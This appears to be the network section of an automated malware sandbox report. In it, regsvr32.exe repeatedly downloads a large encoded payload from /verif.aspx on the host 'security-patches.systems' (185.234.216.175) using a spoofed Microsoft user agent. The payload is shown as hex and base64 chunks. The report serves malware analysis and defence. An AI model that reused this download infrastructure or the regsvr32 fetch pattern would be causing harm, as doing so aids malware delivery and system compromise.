                                            2024-12-06 21:11:13 UTC16384INData Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38
                                            Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
                                            2024-12-06 21:11:13 UTC16384INData Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51
                                            Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
                                            2024-12-06 21:11:14 UTC16384INData Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79
                                            Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
                                            2024-12-06 21:11:14 UTC16384INData Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55
                                            Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
                                            2024-12-06 21:11:14 UTC16384INData Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42
                                            Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.549707185.234.216.1754436204C:\Windows\SysWOW64\regsvr32.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-06 21:11:15 UTC117OUTGET /verif.aspx HTTP/1.1
                                            User-Agent: Microsoft-WNS/11.0
                                            Host: security-patches.systems
                                            Cache-Control: no-cache
                                            2024-12-06 21:11:15 UTC252INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:15 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                            ETag: "d75c4-62796294faafa"
                                            Accept-Ranges: bytes
                                            Content-Length: 882116
                                            Connection: close
                                            2024-12-06 21:11:15 UTC7940INData Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b
                                            Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
                                            2024-12-06 21:11:15 UTC16384INData Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73
                                            Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
                                            2024-12-06 21:11:16 UTC16384INData Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e
                                            Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
                                            2024-12-06 21:11:16 UTC16384INData Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e
                                            Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
                                            2024-12-06 21:11:16 UTC16384INData Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32
                                            Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
                                            2024-12-06 21:11:16 UTC16384INData Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38
                                            Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
                                            2024-12-06 21:11:16 UTC16384INData Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51
                                            Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
                                            2024-12-06 21:11:16 UTC16384INData Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79
                                            Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
                                            2024-12-06 21:11:16 UTC16384INData Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55
                                            Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
                                            2024-12-06 21:11:16 UTC16384INData Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42
                                            Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.549795185.234.216.1754435956C:\Windows\SysWOW64\regsvr32.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-06 21:12:12 UTC117OUTGET /verif.aspx HTTP/1.1
                                            User-Agent: Microsoft-WNS/11.0
                                            Host: security-patches.systems
                                            Cache-Control: no-cache
                                            2024-12-06 21:12:13 UTC252INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:12 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                            ETag: "d75c4-62796294faafa"
                                            Accept-Ranges: bytes
                                            Content-Length: 882116
                                            Connection: close
                                            2024-12-06 21:12:13 UTC7940INData Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b
                                            Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
                                            2024-12-06 21:12:13 UTC16384INData Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73
